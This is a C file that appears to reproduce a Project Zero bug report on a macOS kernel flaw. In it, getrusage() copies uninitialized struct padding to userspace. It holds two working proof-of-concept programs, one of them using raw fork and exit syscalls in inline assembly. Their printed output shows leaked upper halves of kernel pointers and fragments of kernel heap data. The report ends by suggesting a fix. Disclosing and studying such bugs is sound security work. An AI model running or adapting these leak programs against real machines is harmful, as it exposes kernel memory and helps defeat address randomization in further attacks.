/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405 For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace: int getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval) { struct rusage *rup, rubuf; struct user64_rusage rubuf64; struct user32_rusage rubuf32; size_t retsize = sizeof(rubuf); // default: 32 bits caddr_t retbuf = (caddr_t)&rubuf; // default: 32 bits struct timeval utime; struct timeval stime; switch (uap->who) { case RUSAGE_SELF: calcru(p, &utime, &stime, NULL); proc_lock(p); rup = &p->p_stats->p_ru; rup->ru_utime = utime; rup->ru_stime = stime; rubuf = *rup; proc_unlock(p); break; [...] } if (IS_64BIT_PROCESS(p)) { retsize = sizeof(rubuf64); retbuf = (caddr_t)&rubuf64; munge_user64_rusage(&rubuf, &rubuf64); } else { [...] } return (copyout(retbuf, uap->rusage, retsize)); } `munge_user64_rusage()` performs the conversion by copying individual fields: __private_extern__ void munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p) { // timeval changes size, so utime and stime need special handling a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec; a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec; a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec; a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec; [...] } `struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element: #define _STRUCT_USER64_TIMEVAL struct user64_timeval _STRUCT_USER64_TIMEVAL { user64_time_t tv_sec; // seconds __int32_t tv_usec; // and microseconds }; struct user64_rusage { struct user64_timeval ru_utime; // user time used struct user64_timeval ru_stime; // system time used user64_long_t ru_maxrss; // max resident set size [...] }; This padding is not initialized, but is copied to userspace. The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0. Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers. The returned data seems to come from the previous syscall: $ cat test.c #include #include #include #include #include #include void do_leak(void) { static struct rusage ru; getrusage(RUSAGE_SELF, &ru); static unsigned int leak1, leak2; memcpy(&leak1, ((char*)&ru)+12, 4); memcpy(&leak1, ((char*)&ru)+28, 4); printf("leak1: 0x%08x\n", leak1); printf("leak2: 0x%08x\n", leak2); } int main(void) { do_leak(); do_leak(); do_leak(); int fd = open("/dev/null", O_RDONLY); do_leak(); int dummy; read(fd, &dummy, 4); do_leak(); return 0; } $ gcc -o test test.c && ./test leak1: 0x00000000 leak2: 0x00000000 leak1: 0xffffff80 leak2: 0x00000000 leak1: 0xffffff80 leak2: 0x00000000 leak1: 0xffffff80 leak2: 0x00000000 leak1: 0xffffff81 leak2: 0x00000000 However, I believe that this can also be used to disclose kernel heap memory. When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack without zeroing it, so the new stack contains data from previous heap allocations. The following testcase, when run after repeatedly reading a wordlist into memory, leaks some non-pointer data that seems to come from the wordlist: $ cat forktest.c */ #include #include #include #include #include #include void do_leak(void) { static struct rusage ru; getrusage(RUSAGE_SELF, &ru); static unsigned int leak1, leak2; memcpy(&leak1, ((char*)&ru)+12, 4); memcpy(&leak2, ((char*)&ru)+28, 4); char str[1000]; if (leak1 != 0) { sprintf(str, "leak1: 0x%08x\n", leak1); write(1, str, strlen(str)); } if (leak2 != 0) { sprintf(str, "leak2: 0x%08x\n", leak2); write(1, str, strlen(str)); } } void leak_in_child(void) { int res_pid, res2; asm volatile( "mov $0x02000002, %%rax\n\t" "syscall\n\t" : "=a"(res_pid), "=d"(res2) : : "cc", "memory", "rcx", "r11" ); //write(1, "postfork\n", 9); if (res2 == 1) { //write(1, "child\n", 6); do_leak(); char dummy; read(0, &dummy, 1); asm volatile( "mov $0x02000001, %rax\n\t" "mov $0, %rdi\n\t" "syscall\n\t" ); } //printf("fork=%d:%d\n", res_pid, res2); int wait_res; //wait(&wait_res); } int main(void) { for(int i=0; i<1000; i++) { leak_in_child(); } } /* $ gcc -o forktest forktest.c && ./forktest leak1: 0x1b3b1320 leak1: 0x00007f00 leak1: 0x65686375 leak1: 0x410a2d63 leak1: 0x8162ced5 leak1: 0x65736168 leak1: 0x0000042b The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist. Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack. */